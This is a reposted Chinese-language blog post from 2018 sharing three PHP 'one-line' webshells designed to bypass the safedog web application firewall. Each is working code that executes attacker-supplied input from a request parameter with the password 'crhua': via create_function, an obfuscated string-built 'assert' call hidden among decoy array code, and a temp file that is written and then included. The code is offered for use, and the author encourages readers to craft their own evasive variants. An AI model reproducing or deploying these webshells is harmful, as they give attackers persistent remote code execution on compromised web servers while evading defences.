[18679] 2018-05-08_bypass-webshell总结

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
bypass-webshell总结

bypass-webshell总结

crhua huasec 2018-05-08

昨晚有个大兄弟找我要过狗一句话,今天我就给大家分享下几个过狗一句话。另外推荐一篇我之前写的文章,移步到 http://www.freebuf.com/articles/system/164076.html

NO.1

<?php
$pass = $_POST['crhua'];
$a = create_function("",$pass);
$a();

?>


NO.2

<?php
$fruits = array("a" => "lemon", "ss" => "orange", "ssr" => "banana", "t" => "apple");
function test_alter(&$item1, $key, $prefix)
{
 $item1 = "$prefix: $item1";
}
function test_print($item2, $key)
{
 echo "$key. $item2<br /> ";
}
echo "Before ...: ";
array_walk($fruits, 'test_print');
$a =array_keys($fruits);
print_r($a);
$m =$a[0].$a[1];
$n ='er';
$q = $m.$n.'t'; //assert
$r = $_REQUEST['crhua'];
@$q($r);
//密码crhua
?>


NO.3

<?php
error_reporting();
$p = <<<f
<?php
$crhua = $_REQUEST['crhua'];
function crhua($crhua){
    array_map(create_function("", $crhua), array(1));
}
crhua($crhua);
?>
f;

$temp = tempnam(sys_get_temp_dir(), '');
echo $temp;
fwrite(fopen($temp, 'w'), $p);
include $temp;
unlink($temp);
var_dump(file_exists($temp));
?>


总结

        过狗一句话最简单得就是代码混淆,其次就是利用php一些函数进行绕过。看一下我在fb发的文章,然后自己总结下,属于自己的过狗一句话,指日可待。

附:今天是比较多所以文章更新得晚,有木有在盒子挖洞的,希望能一起交流挖洞的艺术,当然如果有大佬能带带我这个小菜鸡也是很好的,哈哈


      


您需要登录后才可以回帖 登录 | 立即注册

本版积分规则